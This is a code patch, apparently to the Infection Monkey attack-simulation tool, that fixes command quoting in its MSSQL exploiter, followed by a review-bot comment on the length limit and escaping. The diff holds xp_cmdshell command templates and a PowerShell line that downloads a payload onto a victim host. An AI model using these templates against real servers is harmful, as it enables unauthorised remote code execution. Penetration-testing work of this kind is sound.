From ef63f2699b708932a7fd14a547b300062465a092 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Tue, 14 Jun 2022 11:18:00 -0400
Subject: [PATCH] Agent: Use single quotes to avoid 128 character limit

The logic that splits up commands into 128 character chunks in MSSQLExploiter is flawed, which results in malformed commands being written to a batch file on the victim. By using single quotes instead of double quotes, the 128 character limit is circumvented and there's no longer any need to break up the commands. See #2018 for more details. Fixes #2018
---
 monkey/infection_monkey/exploit/mssqlexec.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index b519ee422..453e875ca 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -33,16 +33,16 @@ class MSSQLExploiter(HostExploiter):
 TMP_FILE_NAME = "tmp_monkey.bat"
 TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
 
- MAX_XP_CMDSHELL_COMMAND_SIZE = 128
+ MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
 
- XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
- XP_CMDSHELL_COMMAND_END = '"'
+ XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
+ XP_CMDSHELL_COMMAND_END = "'"
 
 EXPLOIT_COMMAND_PREFIX = ">{payload_file_path}"
 CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
 MONKEY_DOWNLOAD_COMMAND = (
 "powershell (new-object System.Net.WebClient)."
- "DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
+ "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
 )
 
 def __init__(self):
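Review bot: `MAX_XP_CMDSHELL_COMMAND_SIZE = 12800` is an unexplained constant that exceeds what xp_cmdshell itself accepts (its command_string parameter is varchar(8000)), so the chunking it gates would never trigger before the server rejects the statement; since the description says chunking is no longer needed, the splitting path (outside this hunk) should be removed rather than the threshold raised, or at least the value documented with `# Chunking is kept only as a safety net; xp_cmdshell's own argument limit is 8000 chars.`. Switching the delimiter to a single quote also means every `'` inside the embedded command must now be doubled, which the hunk does for MONKEY_DOWNLOAD_COMMAND but not for the values interpolated into `{http_path}`, `{dst_path}` or the `%temp%` paths, so a value containing `'` would terminate the T-SQL string early — wherever these templates are filled in (not visible here) the interpolated values should have `'` replaced with `''`. The MSSQLExploiter class body continues past the end of the hunk.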